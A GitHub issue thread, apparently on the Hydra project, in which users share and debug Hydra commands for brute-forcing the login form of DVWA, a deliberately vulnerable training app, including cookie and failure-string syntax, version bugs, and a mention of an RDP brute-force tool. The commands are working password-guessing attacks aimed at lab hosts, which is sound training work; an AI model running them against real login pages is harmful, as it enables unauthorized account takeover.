-
Notifications
You must be signed in to change notification settings - Fork 2k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
SOLUTION: How to solve DVWA /vulnerabilities/brute/ #612
Comments
This comment was marked as outdated.
This comment was marked as outdated.
This comment was marked as outdated.
This comment was marked as outdated.
This comment was marked as outdated.
This comment was marked as outdated.
This comment was marked as outdated.
This comment was marked as outdated.
This comment was marked as outdated.
This comment was marked as outdated.
This comment was marked as outdated.
This comment was marked as outdated.
This comment was marked as outdated.
This comment was marked as outdated.
This comment was marked as outdated.
This comment was marked as outdated.
This comment was marked as outdated.
This comment was marked as outdated.
This comment was marked as outdated.
This comment was marked as outdated.
This comment was marked as outdated.
This comment was marked as outdated.
This comment was marked as outdated.
This comment was marked as outdated.
hydra 176.152.21.45 http-form-post "/dvwa/login.php:username=^USER^&password=^PASS^&Login=submit:Login failed" -L username.txt -P passwords.txt Note: 176.152.21.45 is the target IP, /dvwa/login.php is the target address. don't add http or https in front of it, username is the field name of user name, and password is the field name of password. You can find them in source code. Login failed is the message printed on webpage in case you enter a wrong username and password, Login is the name of the login button in the source code. and username.txt and password.txt are the list of usernames and passwords and should be saved in the same directory where you run this code. Good luck |
I have a problem in termux.When i use hydra,it shows 'hydra command not
found'. What is the solution please reply.
…On Sun, Jan 29, 2023, 10:36 AM Khaibrullah Munsef ***@***.***> wrote:
hydra 176.152.21.45 http-form-post
"/dvwa/login.php:username=^USER^&password=^PASS^&Login=submit:Login failed"
-L username.txt -P passwords.txt Note: 176.152.21.45 is the target IP,
/dvwa/login.php is the target address. don't add http or https infront of
it, username si the field name of user name, and password is the field name
of password you can find them in source code. Login failed is the message
printed on webpage in case you enter a wrong username and passsword, Login
is the name of the login button in the source code. and username.txt and
password.txt are the list of usernames and passwords and should be saved in
the same directory where you run this code. Good luck
—
Reply to this email directly, view it on GitHub
<#612 (comment)>,
or unsubscribe
<https://github.com/notifications/unsubscribe-auth/A5OVSA6D7MNGL3FDFYBLMPDWUX3GVANCNFSM4ZAG6UTQ>
.
You are receiving this because you are subscribed to this thread.Message
ID: ***@***.***>
|
It seems the F= or S= parameters need to be at the end, e.g. this works:
This fails:
|
Check this out first I try You see it doesn't like 'Username and', wants it to be in format X=value, This seems like a bug in my opinion, what do you guys think? |
Have you tried this with a username and password file? it thinks all my username/password combinations are correct...to me it looks like it's ignoring the F argument.. (this will look like it works fine if you just run the correct user and pass specifying -l, -p) |
If you specify the F= parameter it has to be the last parameter specified, e.g. after the cookie headers in your example. |
When I finish hydra brute force it shows 'valid password no found ' so what
i do next.
Please reply
…On Sun, Jan 29, 2023, 10:30 AM Khaibrullah Munsef ***@***.***> wrote:
use this code: hydra 192.168.10.10 http-form-post
"/dvwa/login.php:usernam=^USER^&password=^PASS^&Login=submit:Login failed"
-L username.txt -P passwords.txt
—
Reply to this email directly, view it on GitHub
<#612 (comment)>,
or unsubscribe
<https://github.com/notifications/unsubscribe-auth/A5OVSA3FP3R5KCEUOVXLWVLWUX2PLANCNFSM4ZAG6UTQ>
.
You are receiving this because you are subscribed to this thread.Message
ID: ***@***.***>
|
I'm having the same issue on a box in Hack the Box. It seems like Hydra just does not evaluate some of the response headers, no matter how you structure your command. I've filed another bug report on it myself. |
Hello, I'm new to cybersecurity and am trying to brute force dvwa on low. I am running this command: hydra -L usernames.txt -P rockyou.txt -s 80 127.0.0.1 http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie:security=low; PHPSESSID=cfdrv2bm5folucadb2fs15o223" -I Between each [ATTEMPT] message in the CLI, i am getting an "[ERROR] Caught unkown error code, exiting!" message. Does anyone know as to why this might be happening? |
I met this same problem and i solved that through this way!
|
Is there any way to solve high security with hydra? i cant find any resources in it online. |
FastRDP is a tool for brute force attacks on the Remote Desktop Protocol (RDP) on the Windows operating system, which allows users to remotely connect to computers and servers. This tool is written in C# programming language. Also, this tool has a Multi-threading feature that increases the efficiency and speed of testing simultaneous compounds. |
As many people are not able to solve this easily - this is how to do it:
hydra -l admin -p password 'http-get-form://127.0.0.1/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\:PHPSESSID=61p8up0thkqjft9vn5osv6afk2; security=low:F=Username and/or password incorrect'
you can replace
-p password
with with -P and a file containing passwords, e.g.-P passwords.txt
Note: you need hydra 9.0 - or better 9,2+. hydra 9.1 has a bug in the module and does not work.
If your Linux distribution comes with an old version, contact the package maintainer or compile hydra yourself.
The text was updated successfully, but these errors were encountered: